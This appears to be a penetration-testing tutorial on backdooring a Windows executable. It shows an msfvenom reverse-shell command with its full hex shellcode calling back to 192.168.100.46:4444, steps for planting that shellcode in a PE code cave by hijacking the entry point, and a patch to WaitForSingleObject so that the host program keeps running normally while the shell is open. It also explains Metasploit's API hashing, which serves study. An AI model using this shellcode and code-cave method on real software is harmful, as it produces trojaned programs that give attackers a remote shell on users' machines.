Looking for the WaitForSingleObject call in modern Metasploit shellcode

Intro

This article describes the process of locating the WaitForSingleObject(…) call in msfvenom-generated shellcode. It involves a bit of analysis of the windows/shell_reverse_tcp payload.

Step 1: Generating payload

First, we need to generate the shellcode using msfvenom. The main trick is to set EXITFUNC=none so that our program keeps running after the shellcode completes.

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.100.46 LPORT=4444 EXITFUNC=none -f hex
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of hex file: 648 bytes
fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6833320000687773325f54684c772607ffd5b89001000029c454506829806b00ffd5505050504050405068ea0fdfe0ffd5976a0568c0a8642e680200115c89e66a1056576899a57461ffd585c0740cff4e0875ec68f0b5a256ffd568636d640089e357575731f66a125956e2fd66c744243c01018d442410c60044545056565646564e565653566879cc3f86ffd589e04e5646ff306808871d60ffd5bbaac5e25d68a695bd9dffd53c067c0a80fbe07505bb4713726f6a0053ffd5

I spent a couple of hours trying to figure out why the windows/exec payload doesn’t work. The answer is that it generates a payload laid out as shellcode + cmd_string, so when the shellcode returns from the function, execution runs right into cmd_string.

Step 2: Preparing executable

Create a new section with the following attributes: Name: .NewSec, VOffset: 0x46000, VSize: 0x1000, ROffset: 0x2D000, RSize: 0x1000, Flags: 0xE00000E0.
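To see what the section flags mean, here is a small sketch that decodes them. It assumes the intended value is the 32-bit 0xE00000E0 (the Characteristics field of a PE section header is a DWORD); the helper name decode_section_flags is made up for this example.

```python
# Section characteristic bits as defined by the PE/COFF format.
SECTION_FLAGS = {
    0x00000020: "IMAGE_SCN_CNT_CODE",
    0x00000040: "IMAGE_SCN_CNT_INITIALIZED_DATA",
    0x00000080: "IMAGE_SCN_CNT_UNINITIALIZED_DATA",
    0x20000000: "IMAGE_SCN_MEM_EXECUTE",
    0x40000000: "IMAGE_SCN_MEM_READ",
    0x80000000: "IMAGE_SCN_MEM_WRITE",
}


def decode_section_flags(value):
    """Return the names of all known flag bits set in value (hypothetical helper)."""
    return [name for bit, name in sorted(SECTION_FLAGS.items()) if value & bit]


if __name__ == "__main__":
    for name in decode_section_flags(0xE00000E0):
        print(name)
```

In other words, the new section is marked as code and data that is readable, writable, and executable, which is what a code cave holding self-modifying or stack-using shellcode needs.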

If you are doing CTP/OSCE, you are probably familiar with overwriting the first bytes of a program at its Original Entry Point. You can do that, or you can overwrite AddressOfEntryPoint in the PE header.

Then you need to create a code cave like this:

  1. pushad
  2. pushfd
  3. msfvenom generated payload
  4. stack alignment via sub esp, ... or add esp, ...
  5. popfd
  6. popad
  7. return to the original flow (depends on the way you hijacked the original flow)
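The layout above can be sketched in Python as a byte string builder. This is only an illustration under stated assumptions: build_code_cave, esp_fixup, cave_va and return_va are names invented for this example, the ESP correction has to be measured in a debugger for your own target, and the return is assumed to be a plain jmp rel32.

```python
import struct


def build_code_cave(payload, esp_fixup, cave_va, return_va):
    """Assemble the seven-step code cave as raw x86 bytes (hypothetical helper).

    payload   -- msfvenom-generated shellcode
    esp_fixup -- signed value added to ESP after the payload (negative = sub)
    cave_va   -- virtual address where the cave starts
    return_va -- virtual address to jump back to
    """
    cave = b"\x60"                                      # pushad
    cave += b"\x9c"                                     # pushfd
    cave += payload                                     # shellcode
    cave += b"\x81\xc4" + struct.pack("<i", esp_fixup)  # add esp, imm32
    cave += b"\x9d"                                     # popfd
    cave += b"\x61"                                     # popad
    # jmp rel32 is relative to the address of the instruction after the jmp.
    next_instruction = cave_va + len(cave) + 5
    cave += b"\xe9" + struct.pack("<i", return_va - next_instruction)
    return cave


if __name__ == "__main__":
    # Placeholder payload and addresses, for illustration only.
    demo = build_code_cave(b"\x90" * 4, 0x200, 0x446000, 0x401000)
    print(demo.hex())
```

If you hijacked the flow by overwriting instructions at the entry point, those instructions still have to be accounted for before the final jump; the sketch leaves that out.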

Step 3: Understanding Metasploit shellcode

I am lazy, so I’m not going to reverse the whole shellcode by myself. The Metasploit git repo has the assembly source code for all payloads. Yes, that simple. For example, here’s our reverse_tcp payload:

  cld                    ; Clear the direction flag.
  call start             ; Call start, this pushes the address of 'api_call' onto the stack.
%include "./src/block/block_api.asm"
start:                   ;
  pop ebp                ; Pop off the address of 'api_call' for calling later.
%include "./src/block/block_reverse_tcp.asm"
  ; By here we will have performed the reverse_tcp connection and EDI will be out socket.
%include "./src/block/block_shell.asm"
    ; Finish up with the EXITFUNK.
%include "./src/block/block_exitfunk.asm"

It consists of multiple submodules, which can be found here.

block_api.asm defines a function to look up API functions. Note that msfvenom-generated shellcode looks up API functions by their hashes, not by names or addresses. It therefore contains no direct pointers, which makes it a real pain in the ass to RE.

To calculate a hash, the following Python code might be used:

def ror( dword, bits ):
  # Rotate a 32-bit value right by the given number of bits.
  return ( dword >> bits | dword << ( 32 - bits ) ) & 0xFFFFFFFF

def unicode( string, uppercase=True ):
  # Emulate the UTF-16LE module name: each character followed by a null byte.
  result = ""
  if uppercase:
    string = string.upper()
  for c in string:
    result += c + "\x00"
  return result

def hash( module, function, bits=13, print_hash=True ):
  module_hash = 0
  function_hash = 0
  for c in unicode( module + "\x00" ):
    module_hash  = ror( module_hash, bits )
    module_hash += ord( c )
  for c in str( function + "\x00" ):
    function_hash  = ror( function_hash, bits )
    function_hash += ord( c )
  # The final hash is the 32-bit sum of the module and function hashes.
  h = ( module_hash + function_hash ) & 0xFFFFFFFF
  if print_hash:
    # print() with a single argument works on both Python 2 and Python 3.
    print( "[+] 0x%08X = %s!%s" % ( h, module.lower(), function ) )
  return h

if __name__ == '__main__':
  hash( 'kernel32.dll', 'WaitForSingleObject' )

When we run it, it will display the hash of the WaitForSingleObject function in the kernel32.dll module.

$ python hash.py
[+] 0x601D8708 = kernel32.dll!WaitForSingleObject

The hash is 0x601D8708 and we’ll return to it a bit later.

Next, the shellcode connects back to our box using the code from block_reverse_tcp.asm. This code calls API functions through the lookup function defined in block_api.asm (those push <hash>; call ebp sequences) and then returns the socket in the edi register. For example, connect is called like this:

push byte 16           ; length of the sockaddr struct
push esi               ; pointer to the sockaddr struct
push edi               ; the socket
push 0x6174A599        ; hash( "ws2_32.dll", "connect" )
call ebp               ; connect( s, &sockaddr, 16 );

Then the shellcode spawns a shell using block_shell.asm. This code calls CreateProcessA with our socket as stdin, stdout, and stderr.

Finally, block_exitfunk.asm calls the appropriate exit function (the one specified via the EXITFUNC parameter).

Step 4: Fixing shellcode

If we look closely at the block_shell.asm code, we’ll see that it uses the WaitForSingleObject function. This snippet shows the call:

dec esi                ; Decrement ESI down to -1 (INFINITE)
push esi               ; push INFINITE inorder to wait forever
inc esi                ; Increment ESI back to zero
push dword [eax]       ; push the handle from our PROCESS_INFORMATION.hProcess
push 0x601D8708        ; hash( "kernel32.dll", "WaitForSingleObject" )
call ebp               ; WaitForSingleObject( pi.hProcess, INFINITE );

Now that we know how to compute the hash of a function, we could read this code even if there were no comments. Just look for the push 0x601D8708 instruction.
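The same idea works on the raw bytes. The sketch below scans for the byte pattern of push imm32 followed by call ebp (68 xx xx xx xx FF D5) and labels the hashes we already know from the Metasploit source comments. The function name find_api_calls and the table KNOWN_HASHES are made up for this example, and the two inputs are short excerpts of the hex dump from Step 1, not the whole payload. A plain byte scan like this can produce false positives and misses calls that load the hash in some other way, so treat it as a rough aid.

```python
import struct

# Hashes taken from the comments in the Metasploit sources quoted in this article.
KNOWN_HASHES = {
    0x6174A599: "ws2_32.dll!connect",
    0x601D8708: "kernel32.dll!WaitForSingleObject",
}

CALL_EBP = b"\xff\xd5"


def find_api_calls(shellcode):
    """Return (offset, hash, name) for every 'push imm32; call ebp' byte pattern."""
    calls = []
    for offset in range(len(shellcode) - 6):
        if shellcode[offset] != 0x68:            # opcode of push imm32
            continue
        if shellcode[offset + 5:offset + 7] != CALL_EBP:
            continue
        (api_hash,) = struct.unpack("<I", shellcode[offset + 1:offset + 5])
        calls.append((offset, api_hash, KNOWN_HASHES.get(api_hash, "unknown")))
    return calls


if __name__ == "__main__":
    excerpts = [
        "6a1056576899a57461ffd5",          # the connect call
        "89e04e5646ff306808871d60ffd5",    # the WaitForSingleObject call
    ]
    for excerpt in excerpts:
        for offset, api_hash, name in find_api_calls(bytes.fromhex(excerpt)):
            print("+0x%02X push 0x%08X ; %s" % (offset, api_hash, name))
```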

We see this code uses INFINITE as a value for the dwMilliseconds parameter. The prototype of the WaitForSingleObject function is:

DWORD WINAPI WaitForSingleObject(
  _In_ HANDLE hHandle,
  _In_ DWORD  dwMilliseconds
);

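With INFINITE, the call blocks until the spawned shell exits, so the host program appears to hang. To avoid this glitch, we must set dwMilliseconds to zero, which makes the call return immediately. We can do that simply by changing dec esi to nop, so that ESI is still zero when it is pushed.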
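If you prefer to patch the bytes with a script rather than in a debugger, a minimal sketch could look like the following. The function name patch_wait_timeout is invented for this example, and it assumes the instruction layout shown in the block_shell.asm snippet, where dec esi sits exactly five bytes before the push of the hash. The sample input is a short excerpt of the hex dump from Step 1.

```python
PUSH_WAIT_HASH = bytes.fromhex("6808871d60")  # push 0x601D8708
DEC_ESI = 0x4E
NOP = 0x90


def patch_wait_timeout(shellcode):
    """Replace the 'dec esi' before the WaitForSingleObject call with a nop."""
    patched = bytearray(shellcode)
    push_offset = patched.find(PUSH_WAIT_HASH)
    if push_offset < 5:
        raise ValueError("push 0x601D8708 not found where expected")
    # dec esi (1) + push esi (1) + inc esi (1) + push dword [eax] (2) = 5 bytes
    dec_offset = push_offset - 5
    if patched[dec_offset] != DEC_ESI:
        raise ValueError("unexpected byte at the dec esi position")
    patched[dec_offset] = NOP
    return bytes(patched)


if __name__ == "__main__":
    excerpt = bytes.fromhex("89e04e5646ff306808871d60ffd5")
    print(patch_wait_timeout(excerpt).hex())
```

The two checks make the script refuse to touch shellcode whose layout differs from the one analysed here, for example output from another payload or an encoded payload.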

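Now the relevant part of our shellcode should look like this:

nop                    ; was dec esi, so ESI stays at zero
push esi               ; push 0 as dwMilliseconds
inc esi                ; ESI is now 1 rather than 0
push dword [eax]       ; push the handle from our PROCESS_INFORMATION.hProcess
push 0x601D8708        ; hash( "kernel32.dll", "WaitForSingleObject" )
call ebp               ; WaitForSingleObject( pi.hProcess, 0 );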

Copy the changes to the executable and save it. Then re-run it and everything should work fine.
